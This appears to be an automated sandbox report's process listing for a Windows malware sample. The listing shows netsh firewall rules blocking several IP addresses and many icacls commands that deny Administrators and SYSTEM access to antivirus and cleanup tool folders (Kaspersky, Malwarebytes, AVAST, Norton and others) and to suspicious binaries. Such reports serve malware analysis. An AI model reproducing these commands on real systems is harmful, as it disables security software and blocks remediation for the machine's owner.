C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
